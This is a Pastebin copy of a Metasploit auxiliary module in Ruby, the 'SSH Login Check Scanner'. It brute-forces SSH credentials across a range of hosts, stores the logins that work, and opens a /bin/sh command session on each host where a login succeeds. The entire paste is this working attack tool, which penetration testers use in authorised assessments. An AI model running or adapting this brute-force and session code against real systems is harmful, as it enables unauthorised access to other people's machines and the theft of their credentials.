Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This module requires Metasploit: https://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'net/ssh'
- require 'net/ssh/command_stream'
- require 'metasploit/framework/login_scanner/ssh'
- require 'metasploit/framework/credential_collection'
- class MetasploitModule < Msf::Auxiliary
- include Msf::Auxiliary::AuthBrute
- include Msf::Auxiliary::Report
- include Msf::Auxiliary::CommandShell
- include Msf::Auxiliary::Scanner
- def initialize
- super(
- 'Name' => 'SSH Login Check Scanner',
- 'Description' => %q{
- This module will test ssh logins on a range of machines and
- report successful logins. If you have loaded a database plugin
- and connected to a database this module will record successful
- logins and hosts so you can track your access.
- },
- 'Author' => ['todb'],
- 'References' =>
- [
- [ 'CVE', '1999-0502'] # Weak password
- ],
- 'License' => MSF_LICENSE,
- 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
- )
- register_options(
- [
- Opt::RPORT(22)
- ], self.class
- )
- register_advanced_options(
- [
- Opt::Proxies,
- OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
- OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
- ]
- )
- end
- def rport
- datastore['RPORT']
- end
- def session_setup(result, ssh_socket)
- return unless ssh_socket
- # Create a new session
- conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
- merge_me = {
- 'USERPASS_FILE' => nil,
- 'USER_FILE' => nil,
- 'PASS_FILE' => nil,
- 'USERNAME' => result.credential.public,
- 'PASSWORD' => result.credential.private
- }
- info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
- s = start_session(self, info, merge_me, false, conn.lsock)
- self.sockets.delete(ssh_socket.transport.socket)
- # Set the session platform
- case result.proof
- when /Linux/
- s.platform = "linux"
- when /Darwin/
- s.platform = "osx"
- when /SunOS/
- s.platform = "solaris"
- when /BSD/
- s.platform = "bsd"
- when /HP-UX/
- s.platform = "hpux"
- when /AIX/
- s.platform = "aix"
- when /Win32|Windows/
- s.platform = "windows"
- when /Unknown command or computer name/
- s.platform = "cisco-ios"
- end
- s
- end
- def run_host(ip)
- @ip = ip
- cred_collection = Metasploit::Framework::CredentialCollection.new(
- blank_passwords: datastore['BLANK_PASSWORDS'],
- pass_file: datastore['PASS_FILE'],
- password: datastore['PASSWORD'],
- user_file: datastore['USER_FILE'],
- userpass_file: datastore['USERPASS_FILE'],
- username: datastore['USERNAME'],
- user_as_pass: datastore['USER_AS_PASS'],
- )
- cred_collection = prepend_db_passwords(cred_collection)
- scanner = Metasploit::Framework::LoginScanner::SSH.new(
- host: ip,
- port: rport,
- cred_details: cred_collection,
- proxies: datastore['Proxies'],
- stop_on_success: datastore['STOP_ON_SUCCESS'],
- bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
- connection_timeout: datastore['SSH_TIMEOUT'],
- framework: framework,
- framework_module: self,
- )
- scanner.verbosity = :debug if datastore['SSH_DEBUG']
- scanner.scan! do |result|
- credential_data = result.to_h
- credential_data.merge!(
- module_fullname: self.fullname,
- workspace_id: myworkspace_id
- )
- case result.status
- when Metasploit::Model::Login::Status::SUCCESSFUL
- print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
- credential_data[:private_type] = :password
- credential_core = create_credential(credential_data)
- credential_data[:core] = credential_core
- create_credential_login(credential_data)
- session_setup(result, scanner.ssh_socket)
- :next_user
- when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
- vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
- scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
- invalidate_login(credential_data)
- :abort
- when Metasploit::Model::Login::Status::INCORRECT
- vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
- invalidate_login(credential_data)
- scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
- else
- invalidate_login(credential_data)
- scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
- end
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement